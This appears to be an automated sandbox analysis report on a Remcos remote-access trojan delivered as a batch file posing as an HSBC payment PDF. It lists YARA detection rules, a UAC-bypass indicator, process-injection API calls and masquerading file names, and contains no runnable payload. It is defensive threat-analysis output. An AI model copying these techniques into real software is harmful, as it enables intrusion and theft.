              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FCD93A0: CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext

              System Summary

              Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: USD470900_COPY_800BLHSBC882001.PDF.bat Static file information: 3383372
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6A0E889E4: NtQueryInformationToken,NtQueryInformationToken
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6A0E73D94: _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6A0E8898C: NtQueryInformationToken
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6A0EA1538: SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6A0E87FF8: RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6A0E88114: NtQueryVolumeInformationFile,GetFileInformationByHandleEx
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6A0E9BCF0: fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6A0E888C0: NtOpenThreadToken,NtOpenProcessToken,NtClose
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6A0E889E4: NtQueryInformationToken,NtQueryInformationToken
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6A0E73D94: _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6A0E8898C: NtQueryInformationToken
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6A0EA1538: SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6A0E87FF8: RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6A0E88114: NtQueryVolumeInformationFile,GetFileInformationByHandleEx
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6A0E9BCF0: fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF6A0E888C0: NtOpenThreadToken,NtOpenProcessToken,NtClose
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF68FCFC964: NtQuerySystemTime,RtlTimeToSecondsSince1970
              Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 10_2_02D48730: NtQueueApcThread
              Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 10_2_02D47A2C: NtAllocateVirtualMemory
              Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 10_2_02D4DC8C: RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
              Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 10_2_02D4DC04: RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
              Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 10_2_02D4DD70: RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
              Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 10_2_02D47D78: NtWriteVirtualMemory
              Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 10_2_02D48D70: GetThreadContext,SetThreadContext,NtResumeThread
              Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 10_2_02D48D6E: GetThreadContext,SetThreadContext,NtResumeThread
              Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 10_2_02D47A2A: NtAllocateVirtualMemory
              Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 10_2_02D4DBB0: RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6A0E75240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF6A0E84224: InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8BE707_2_00007FF68FC8BE70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC35DF77_2_00007FF68FC35DF7
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC91E2C7_2_00007FF68FC91E2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC11DE87_2_00007FF68FC11DE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0DD847_2_00007FF68FD0DD84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9BDA07_2_00007FF68FC9BDA0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB7D707_2_00007FF68FCB7D70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC59D6C7_2_00007FF68FC59D6C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC61D707_2_00007FF68FC61D70
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC15D087_2_00007FF68FC15D08
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3DD207_2_00007FF68FC3DD20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC39CD07_2_00007FF68FC39CD0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC9CC07_2_00007FF68FCC9CC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5BCE87_2_00007FF68FC5BCE8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC81C907_2_00007FF68FC81C90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD0FC907_2_00007FF68FD0FC90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC1BCA47_2_00007FF68FC1BCA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC53C607_2_00007FF68FC53C60
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB3C107_2_00007FF68FCB3C10
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5FC347_2_00007FF68FC5FC34
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3FC207_2_00007FF68FC3FC20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC29BC87_2_00007FF68FC29BC8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6DBF07_2_00007FF68FC6DBF0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC71B847_2_00007FF68FC71B84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC0FB847_2_00007FF68FC0FB84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC05BA47_2_00007FF68FC05BA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCAFB507_2_00007FF68FCAFB50
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC97B747_2_00007FF68FC97B74
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCCBB287_2_00007FF68FCCBB28
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC67AC87_2_00007FF68FC67AC8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC17AB47_2_00007FF68FC17AB4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7BA487_2_00007FF68FC7BA48
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC33A407_2_00007FF68FC33A40
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB9A587_2_00007FF68FCB9A58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC51A607_2_00007FF68FC51A60
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC01A107_2_00007FF68FC01A10
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2F9B87_2_00007FF68FC2F9B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8F9907_2_00007FF68FC8F990
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC819AC7_2_00007FF68FC819AC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF994C7_2_00007FF68FCF994C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF79387_2_00007FF68FCF7938
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC558CC7_2_00007FF68FC558CC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC678907_2_00007FF68FC67890
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9184C7_2_00007FF68FC9184C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD38747_2_00007FF68FCD3874
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9D8587_2_00007FF68FC9D858
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC1F8007_2_00007FF68FC1F800
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC218307_2_00007FF68FC21830
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB38207_2_00007FF68FCB3820
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC777C87_2_00007FF68FC777C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC417D47_2_00007FF68FC417D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6D7F07_2_00007FF68FC6D7F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC1B7887_2_00007FF68FC1B788
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC597907_2_00007FF68FC59790
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC837607_2_00007FF68FC83760
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8F6D87_2_00007FF68FC8F6D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDD6DC7_2_00007FF68FCDD6DC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB76787_2_00007FF68FCB7678
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE76787_2_00007FF68FCE7678
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC576B07_2_00007FF68FC576B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCBD6A07_2_00007FF68FCBD6A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC456487_2_00007FF68FC45648
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE36387_2_00007FF68FCE3638
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD56607_2_00007FF68FCD5660
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2D6607_2_00007FF68FC2D660
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC0F6107_2_00007FF68FC0F610
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC895FC7_2_00007FF68FC895FC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC655F07_2_00007FF68FC655F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3B58C7_2_00007FF68FC3B58C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD95807_2_00007FF68FCD9580
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3156C7_2_00007FF68FC3156C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7F5207_2_00007FF68FC7F520
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD14F07_2_00007FF68FCD14F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB94947_2_00007FF68FCB9494
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC674787_2_00007FF68FC67478
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF94A87_2_00007FF68FCF94A8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC254A07_2_00007FF68FC254A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC054387_2_00007FF68FC05438
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC4D4407_2_00007FF68FC4D440
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCAD4607_2_00007FF68FCAD460
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC073F87_2_00007FF68FC073F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7D4107_2_00007FF68FC7D410
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC4F4347_2_00007FF68FC4F434
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD033D47_2_00007FF68FD033D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF33D07_2_00007FF68FCF33D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCEB3AC7_2_00007FF68FCEB3AC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC373407_2_00007FF68FC37340
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2B36C7_2_00007FF68FC2B36C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC953187_2_00007FF68FC95318
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC692C47_2_00007FF68FC692C4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC0F2C07_2_00007FF68FC0F2C0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5D2C07_2_00007FF68FC5D2C0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC792D87_2_00007FF68FC792D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB52907_2_00007FF68FCB5290
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDD2B47_2_00007FF68FCDD2B4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC511C87_2_00007FF68FC511C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC1D1B87_2_00007FF68FC1D1B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC531E07_2_00007FF68FC531E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8F1687_2_00007FF68FC8F168
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DEC31A10_2_02DEC31A
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D320C410_2_02D320C4
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DDC15310_2_02DDC153
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02E0213910_2_02E02139
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DDC6E210_2_02DDC6E2
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DD443F10_2_02DD443F
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02E0896410_2_02E08964
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DDCEF410_2_02DDCEF4
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DD2EA710_2_02DD2EA7
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DF4F5C10_2_02DF4F5C
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DFAC9010_2_02DFAC90
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DE8C8B10_2_02DE8C8B
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DDCD8B10_2_02DDCD8B
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DF53BA10_2_02DF53BA
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DF518B10_2_02DF518B
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02E07A9B10_2_02E07A9B
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DEDAA010_2_02DEDAA0
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DC9E7310_2_02DC9E73
              Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF6A0E83448 appears 36 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FD0F11C appears 37 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FD0F1B8 appears 183 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FCC0D10 appears 181 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FC0D1C8 appears 41 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FC3BC9C appears 280 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FCC7BAC appears 34 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FD164A6 appears 173 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FCC7D70 appears 35 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FC9EB98 appears 93 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FCBABFC appears 818 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D489D0 appears 45 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D344DC appears 74 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D4894C appears 56 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D34860 appears 949 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D34500 appears 33 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D346D4 appears 244 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02DEA120 appears 44 times
Matched YARA rules (rule metadata listed once; the per-source rows below reference the rule names):

Windows_Trojan_Remcos_b296e965: reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
REMCOS_RAT_variants: Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer: author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe

Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer
Source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer
Source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer
Source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer
Source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer
Source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer
Source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_Remcos_b296e965, INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer
Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer
Source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Remcos_b296e965
Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer
Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer
Source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Remcos_b296e965
Source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTR | Matched rules: Windows_Trojan_Remcos_b296e965
Source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTR | Matched rules: Windows_Trojan_Remcos_b296e965
Source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTR | Matched rules: Windows_Trojan_Remcos_b296e965
Source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTR | Matched rules: Windows_Trojan_Remcos_b296e965
              Source: classification engineClassification label: mal100.bank.troj.evad.winBAT@41/22@3/4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E732B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,4_2_00007FF6A0E732B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,7_2_00007FF68FCE826C
